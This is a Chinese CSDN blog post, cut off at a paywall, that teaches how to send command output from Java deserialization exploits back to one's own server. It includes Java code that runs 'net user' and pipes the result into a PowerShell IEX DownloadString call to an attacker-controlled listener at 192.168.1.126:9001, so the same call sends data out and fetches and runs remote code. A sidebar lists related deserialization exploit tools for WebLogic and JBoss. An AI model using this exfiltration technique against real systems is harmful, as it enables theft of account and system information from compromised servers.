JAVA反序列化漏洞命令执行回显方法

最新推荐文章于 2023-07-13 18:43:23 发布
最新推荐文章于 2023-07-13 18:43:23 发布
阅读量612 收藏 1
点赞数
分类专栏: 反序列化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/118653064
版权
本文介绍了在JAVA反序列化漏洞中如何实现命令执行并将结果回显到自己的VPS上,避免依赖外部服务。通过启动WEB服务、处理多行结果、使用BASE64加密提交以及解决中文乱码问题,实现了完美回显。文章提供了一个例子,并给出了相关代码和工具下载链接。
摘要由CSDN通过智能技术生成

简介

在JAVA反序列化漏洞中,可能会有一些漏洞无法直接回显,这时我们可能需外带,通过WEB、FTP、DNS等外带,但是我不喜欢把自己的结果传到别人的网站上,本文教大家如何把结果回显到自己的VPS上,本文主要是JAVA代码,其它命令执行漏洞同理。

启动WEB

Ladon web 9001

JAVA执行命令

javac main.java & java main
注意:get提交换行符需换成别的字符

import java.io.BufferedReader;
import java.io.InputStreamReader;
public class main
{
public static void main(String[] args)
{

Runtime runtime = Runtime.getRuntime();
try {
BufferedReader br = new BufferedReader(new InputStreamReader(runtime.exec("net user").getInputStream()));
String line=null;
StringBuffer b=new StringBuffer();
while ((line=br.readLine())!=null) {
b.append(line+" ");
}
System.out.println(b.toString());
String[] cmd = {"cmd.exe", "/c", "powershell -nop -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.126:9001/getstr/",b.toString(),"')"};

//java.lang.Runtime.getRuntime().exec(cmd).waitFor();
java.lang.Runtime.getRuntime().exec(cmd);
} catch (Exception e) {
e.printStackTrace();
}

}
}

image

返回多行结果

只返回whoami结果没什么问题,

最低0.47元/天 解锁文章
k8gege
关注
专栏目录
Java反序列化回显
02-09 1238
Java反序列化漏洞利用,结果回显是一个需要解决的问题,这里记录学习到的一些回显方法
java反序列化RCE回显研究
java276582434的博客
05-25 2530
总结一下常见反序列化RCE回显几种方式如下: a).使用java.net.URLClassLoader类,远程加载自定义类(放在自己服务器上的jar包),可以自定义方法执行。 b).在自定义类,抛出异常,取得回显结果。 eg:Jboss报错返回命令执行结果。 利用defineClass加载byte[]返回Class对象,不用远程加载恶意类。 直接利用RCE将执行命令写入服务器文件...
Java执行外部命令,并把结果回显到控制台
fdyufgf的博客
02-11 440
Java执行外部命令,并把结果回显到控制台
java cmd回显_Java执行外部命令,并把结果回显到控制台
weixin_33219985的博客
02-26 357
Java执行外部命令,并把结果回显到控制台JAVA现在执行外部命令,主要的方式,还是通过调用所以平台的SHELL去完成,WINDOWS下面就用CMD,LINUX或者是UNIX下面就用SHELL,下面演示一个对BAT文件的调用,并把结果回显到控制台上,其它的应用程序类。说明:一个调用SHELL执行外部取得外部程序的输出流,采用适当的READER读回来,并显示出来就OK了下面是源程序:import j...
linux下java反序列化通杀回显方法的低配版实现 - 先知社区1
08-03
总结来说,这篇文章介绍了一种在Linux环境下利用Java反序列化漏洞实现带内回显的低配方法,通过结合Java代码和Linux系统命令,解决了传统Java反序列化利用回显难题。这种方法虽然相对简单,但对于理解和研究Java...
Java反序列化漏洞利用工具(WebLogic&Jboss)
01-01
4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: weblogic回显结果测试,稍后加入
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,比如... jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java
java反序列化漏洞利用工具Jboss&WebLogic;.rar
07-23
jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java环境,但程序采用.net编写,需要.net 4.0环境 待完成: we blogic回显结果测试,稍后加入
从一道题看java反序列化回显获取
Chenhui98的博客
08-11 218
回到getTransletInstance,可以发现此时会实力话我们注入的恶意类,同时会强制类型转换成AbstractTranslet类型,这两处也是为什么我们需要将我们的恶意类继承com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet,不然无法触发此处构造函数。...
weblogic反序列化漏洞验证脚本(python版)对4.18最新漏洞检测
05-11
对weblogic最新漏洞的检测,自己已经测试,可以使用,在使用之前系统要安装python和修改py文件的ip和weblogic端口
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java反序列化回显解决方案.docx
10-26
Java反序列化回显解决方案.docx
java执行cmd命令回显
hupuxiang的专栏
03-08 3085
java 执行cmd命令回显类 package com.zhouya.common.util; import java.io.*; import java.util.ArrayList; import java.util.List; /** * 执行cmd命令回显 * Copyright: Copyright (c) 2010 *
Java实现文件回显
永远热血的少年
04-26 1059
在项目对已经保存的文件进行回显是经常需要做的,常用的是在后端将文件转为base64编码再传给前端,前端在展示文件的容器(比如最简单的img标签)的url里赋值传过来的base64码就可以回显文件。
java执行linux命令并获取回显,java----调用windows的DOS命令回显/启动和关闭appium...
weixin_42561040的博客
05-11 211
/***Java调用windows的DOS命令*实现调用Windows的ipconfig命令,然后将输出的信息通过IO流输出到控制台。*实现启动appium服务*实现关闭appium服务*/publicclassDoc{publicstaticvoidmain(String[]args)throwsException{Stringcmd="pingwww...
Java Runtime 拿到命令回显
最新发布
Withdraw_end的博客
07-13 400
【代码】Java Runtime 拿到命令回显
Java反序列化回显解决方案
热门推荐
Summer's blog
06-12 1万+
于无常处知有情,于有情处知众生............... 学习无止境,努力就完事。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值